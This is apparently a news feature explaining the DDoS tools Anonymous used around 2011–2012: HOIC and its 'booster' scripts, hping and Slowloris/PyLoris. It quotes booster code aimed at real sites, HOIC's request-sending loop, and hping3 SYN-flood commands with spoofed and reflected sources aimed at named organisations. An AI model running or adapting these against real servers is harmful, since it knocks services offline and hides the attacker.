High Orbits and Slowlorises: understanding the Anonymous attack tools
Most members of Anonymous would prefer to stay, well, anonymous. But as the group has engaged in increasingly high-profile attacks on government and corporate websites, doing so effectively and staying out of harm’s way have become an ever-growing challenge. To protect itself, the group has altered its tactics over the past year to both increase the firepower of its attacks and shield members from the prying eyes of law enforcement.
In late 2011, members of Anonymous began to step away from their most well-known weapon for distributed denial of service attacks. While some in the group continued to try to get enthusiastic followers (or unwary webpage visitors) to use a Web browser version of the Low Orbit Ion Cannon attack tool, use of LOIC had led to the arrests of members of Anonymous and LulzSec last summer. More cautious and technically skilled Anons started to use a collection of other tools and security practices to both step up attacks and hide themselves from being tracked. A message spread through Anonymous’ IRC channels spells it out: “Do NOT use LOIC.”
The attacks on the websites of the Justice Department and others in the wake of the takedown of Megaupload.com were the first demonstration of the power of LOIC’s successor—a DDoS tool called the High Orbit Ion Cannon.
HOIC isn’t exactly rocket science. At its core, it is essentially a simple script for launching HTTP POST and GET requests at a targeted server, wrapped in a “lulz” friendly graphical interface. According to the documentation, it can be used to open up 256 attack sessions simultaneously—either targeting a single server, or going after multiple targets. The user can control the number of threads used per attack.
This rocket needs boosters
The code itself isn’t that sophisticated. HOIC is written in Basic—or, to be more accurate, Real Software’s Real Basic, the cross-platform version of the language originally developed for the Mac. The main power of HOIC is that it can be customized for each attack target relatively easily without having to know how to code, using “boosters,” modules with additional bits of Basic code that are interpreted at runtime.
HOIC’s boosters are used to tailor the HTTP requests sent by HOIC to the target for a specific type of attack. ”HOIC is pretty useless,” the documentation file that comes with the code says, “unless it is used in combination with ‘Boosters.’” And that’s putting it mildly—the attack code is generated based completely on what’s in the booster file. When an attack is launched, HOIC compiles the booster to create the HTTP headers to be sent, and sets the mode of the attack.
One approach commonly used in boosters is to create randomized requests in an attempt to defeat any content delivery network (CDN) or caching used to shield the server from traffic spikes. Some boosters use lists of URLs within a target site, appending them to a table in memory to be used by the attack thread:
// populate rotating urls randURLs.Append "http://www.om.nl/" randURLs.Append "http://www.om.nl/onderwerpen/cybercrime/"
The script also can include a randomized list of user agents, referring sites and random headers that are fed into HTTP requests to make the requests look more legitimate:
useragents.Append " Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:188.8.131.52) Gecko/20070725 Firefox/184.108.40.206" useragents.Append " Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" referers.Append " http://www.google.com/?q=" +URL
The booster script can also include parameters to set the volume of the attack, and to switch between GET and POST requests. For example, here’s the booster set up to attack a dynamic part of Visa’s webpage, using POST, complete with a form submission to the target page:UsePost = true Headers.Append(" User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:220.127.116.11) Gecko/20101027 Firefox/3.6.12" ) Headers.Append(" Keep-Alive: 115") Headers.Append("Proxy-Connection: keep-alive") Headers.Append(" Referer: http://visa.via.infonow.net/locator/global/AdvancedSearchAction.do") Headers.Append(" Cookie: JSESSIONID=5D2E604F487FB5AC9DBF9A1FDEA7D86A.fta-web3" ) URL = "http://visa.via.infonow.net/locator/global/AdvancedSearchAction.do" PostBuffer = "newSearch=true&airport=&pageid=adv&filteredNameSubmit=false&LOC=en_US&country=CHE&street1=2353464756867867876886786777777777777777777777777777786&building=&city=aaaaaaaaaaaaaaa&initialSearchName=&mapAndList=mapAndList&x=27&y=9"
While the scripts themselves can get fairly sophisticated in how they’re configured, a generic booster file distributed with HOIC makes it fairly simple for would-be DDoSers to build a custom booster for their target of ire of the moment and distribute it via a shared document site like PasteBin, Google Documents, or an Etherpad site. For example, when a hungry Anon got upset about a late pizza delivery on Valentine’s Day, he quickly shared a clip of Web addresses to start an impromptu DDoS on Pizza Hut.
The actual code that runs the attacks is executed as threads by a set of timers. ObjTarget.SendAttack is pretty straightforward:'Creating the socket request Dim httpObj as HTTPSocket Dim i as integer Dim reqSize as integer = 0 httpObj = New HTTPSocket ' Adding the headers generated by the booster for i = 0 to Headers.Ubound reqSize = reqSize + Headers(i).Len httpObj.SetRequestHeader(Headers(i).Left(Headers(i).InStr(":")-1), Headers(i).Mid(Headers(i).InStr(":")+1, Headers(i).Len - Headers(i).InStr(":"))) Next 'For attacks wher POST has been chosen as the type of HTTP request if(UsePost) then reqSize = reqSize + PostBuffer.Len + 4 ' POST httpObj.SetPostContent(PostBuffer, "application/x-www-form-urlencoded") httpobj.Post URL 'For GET based attacks else reqSize = reqSize + 3 ' GET httpobj.Get URL end if 'Tracking how much data has been sent to the target TotalBytesSent = TotalBytesSent + reqSizeBut Hoic isn’t the only tool that Anons are promoting.
The old(er) bag of tricks
Despite its improved attacks, HOIC still points an arrow straight back at the source of the DDoS. And some of the targets Anonymous’ various #Ops are going after aren’t suitable for straight-up HTTP attacks. So there are two other tools that have been tossed into Anon’s #Setup recommendations that aren’t exactly new to the security world: Hping and Slowloris, a pair of network security testing tools that also have the potential to be used for evil.
Hping is a TCP/IP "packet assembler and analyzer" initially developed and now maintained by Salvatore Sanfillipo, a Sicilian programmer. It uses a command-line interface similar to that of the pingnetwork utility, but it can do a lot more than make ICMP echo requests. It can be used to throw high volumes of TCP requests at a target, while masking the source of the attack through spoofing, as Anonymous’ tutorial shows:
### Normal hping DoS attack:
hping3 -S -i u100 riaa.org
### Spoofed random source address attack:
hping3 -S -i u100 riaa.org --rand-source
### Reflected attack(it looks like mpaa.org is DoS'ing riaa.org)
hping3 -S -i u100 riaa.org -a mpaa.org
Slowloris is a different sort of attack entirely—a slow HTTP attack that uses partial HTTP requests to a server, making it wait for more chunks of the request and slowly spooning them out to keep the IP socket on the server open. This type of attack works best against low-traffic sites on Apache and a variety of other Web servers by eating up available network ports on the server. It’s ideal for attacks on servers in places where there’s a concern about there being enough bandwidth for a brute-force DDoS to succeed, or where there’s concern about the collateral damage to other users on the same network. That’s why Slowloris was used against Iranian servers during the protests around the Iranian elections in 2009.
But Slowloris is not a tool for the masses. It requires Perl, and runs best on Linux. The author of Slowloris, known as RSnake, said that Windows users “will not be able to successfully execute a Slowloris denial of service from Windows…because Slowloris requires more than a few hundred sockets to work (sometimes a thousand or more), and Windows limits sockets to around 130, from what I've seen.”
However, a Python-based version of the exploit, PyLoris, gets around those limitations. It has a graphical interface, and can be used effectively from Windows; Christopher Gilbert, the developer of PyLoris, claims he’s tested PyLoris on Windows with "over 6000 connections, and [doesn’t] see why it couldn’t use more than that."
PyLoris also includes a feature called TOR Switcher, which allows attacks to be carried out over the anonymized Tor Network and switch between Tor "identities," changing the apparent location the attack is coming from at user-defined intervals.